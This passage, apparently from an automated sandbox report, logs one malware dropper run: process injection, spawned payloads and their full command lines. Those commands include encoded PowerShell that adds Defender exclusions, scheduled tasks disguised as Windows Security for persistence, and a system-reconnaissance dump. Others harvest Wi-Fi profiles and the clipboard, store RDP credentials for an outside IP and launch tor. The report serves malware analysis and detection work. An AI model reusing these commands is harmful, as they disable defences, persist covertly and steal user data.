N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5004 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe
PID 5004 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe
PID 5004 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe
PID 5004 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe
PID 5004 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe
PID 5004 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5004 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
PID 5004 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1184 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5004 wrote to memory of 5932 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\build.exe
PID 5004 wrote to memory of 5932 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\build.exe
PID 536 wrote to memory of 5976 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 536 wrote to memory of 5976 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 536 wrote to memory of 5976 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5004 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\333.exe
PID 5004 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\333.exe
PID 5004 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\333.exe
PID 5932 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\Files\build.exe C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe
PID 5932 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\Files\build.exe C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe
PID 5004 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
PID 5004 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
PID 5004 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
PID 3192 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe C:\Windows\system32\cmd.exe
PID 3192 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe C:\Windows\system32\cmd.exe
PID 3992 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3992 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3192 wrote to memory of 5344 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe C:\Windows\system32\cmd.exe
PID 3192 wrote to memory of 5344 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe C:\Windows\system32\cmd.exe
PID 3192 wrote to memory of 5360 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe C:\Windows\system32\cmd.exe
PID 3192 wrote to memory of 5360 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe C:\Windows\system32\cmd.exe
PID 3992 wrote to memory of 244 N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3992 wrote to memory of 244 N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1948 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe C:\Windows\sysnldcvmr.exe
PID 1948 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe C:\Windows\sysnldcvmr.exe
PID 1948 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe C:\Windows\sysnldcvmr.exe
PID 5344 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5344 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 536 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 536 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 536 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 536 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 536 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 536 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 536 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 536 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 5360 wrote to memory of 5240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 5360 wrote to memory of 5240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 5004 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe
PID 5004 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe
PID 704 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe
PID 704 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe
PID 5004 wrote to memory of 6568 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
PID 5004 wrote to memory of 6568 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
PID 5004 wrote to memory of 6568 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe

"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe

"C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe"

C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe

"C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\Files\build.exe

"C:\Users\Admin\AppData\Local\Temp\Files\build.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwAZwBkAG4ANQB5AGYAagBkAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAEYAaQBsAGUAcwBcAGcAZABuADUAeQBmAGoAZAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVAB5AHAAZQBJAGQALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVAB5AHAAZQBJAGQALgBlAHgAZQA=

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe

"C:\Users\Admin\AppData\Local\Temp\Files\build.exe"

C:\Users\Admin\AppData\Local\Temp\Files\333.exe

"C:\Users\Admin\AppData\Local\Temp\Files\333.exe"

C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe

"C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\sysnldcvmr.exe

C:\Windows\sysnldcvmr.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe

"C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe"

C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe

C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe detached

C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe

"C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM "taskmgr.exe""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\system32\taskkill.exe

taskkill /F /IM "taskmgr.exe"

C:\Users\Admin\AppData\Local\Temp\2802026625.exe

C:\Users\Admin\AppData\Local\Temp\2802026625.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Users\Admin\AppData\Local\Temp\1392523614.exe

C:\Users\Admin\AppData\Local\Temp\1392523614.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "chcp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "chcp"

C:\Windows\system32\schtasks.exe

schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Windows\system32\chcp.com

chcp

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Get-Clipboard

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\chcp.com

chcp

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\HOSTNAME.EXE

hostname

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get caption,description,providername

C:\Windows\system32\net.exe

net user

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user

C:\Windows\system32\query.exe

query user

C:\Windows\system32\quser.exe

"C:\Windows\system32\quser.exe"

C:\Windows\system32\net.exe

net localgroup

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup

C:\Windows\system32\net.exe

net localgroup administrators

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup administrators

C:\Windows\system32\net.exe

net user guest

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user guest

C:\Windows\system32\net.exe

net user administrator

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user administrator

C:\Windows\System32\Wbem\WMIC.exe

wmic startup get caption,command

C:\Windows\system32\tasklist.exe

tasklist /svc

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\system32\ROUTE.EXE

route print

C:\Windows\system32\ARP.EXE

arp -a

C:\Windows\system32\NETSTAT.EXE

netstat -ano

C:\Windows\system32\sc.exe

sc query type= service state= all

C:\Windows\system32\netsh.exe

netsh firewall show state

C:\Windows\system32\netsh.exe

netsh firewall show config

C:\Users\Admin\AppData\Local\Temp\1719112073.exe

C:\Users\Admin\AppData\Local\Temp\1719112073.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Files\BitcoinCore.exe

"C:\Users\Admin\AppData\Local\Temp\Files\BitcoinCore.exe"

C:\Users\Admin\AppData\Local\Temp\Files\SteamDetector.exe

"C:\Users\Admin\AppData\Local\Temp\Files\SteamDetector.exe"

C:\Users\Admin\AppData\Local\Temp\Files\builder.exe

"C:\Users\Admin\AppData\Local\Temp\Files\builder.exe"

C:\Users\Admin\AppData\Local\Temp\1205734847.exe

C:\Users\Admin\AppData\Local\Temp\1205734847.exe

C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe

"C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4810.tmp\4811.tmp\4812.bat C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe"

C:\Windows\system32\cmdkey.exe

cmdkey /generic: 211.168.94.177 /user:"exporter" /pass:"09EC^2n09"

C:\Windows\system32\mstsc.exe

mstsc /v: 211.168.94.177

C:\Users\Admin\AppData\Local\Temp\Files\m.exe

"C:\Users\Admin\AppData\Local\Temp\Files\m.exe"

C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe

"C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe"

C:\Users\Admin\AppData\Local\Temp\188477111.exe

C:\Users\Admin\AppData\Local\Temp\188477111.exe

C:\Users\Admin\AppData\Roaming\SteamDetector.exe

"C:\Users\Admin\AppData\Roaming\SteamDetector.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe

"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"

C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe

"C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe" -f "C:\Users\Admin\AppData\Local\dp3s81isgn\tor\torrc.txt"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\AppData\Local\Temp\2472628288.exe

C:\Users\Admin\AppData\Local\Temp\2472628288.exe

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\SteamDetector.exe" "SteamDetector.exe" ENABLE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\dwm.exe

C:\Windows\System32\dwm.exe

C:\Users\Admin\AppData\Local\Temp\2009521560.exe

C:\Users\Admin\AppData\Local\Temp\2009521560.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe" -service -lunch

C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe

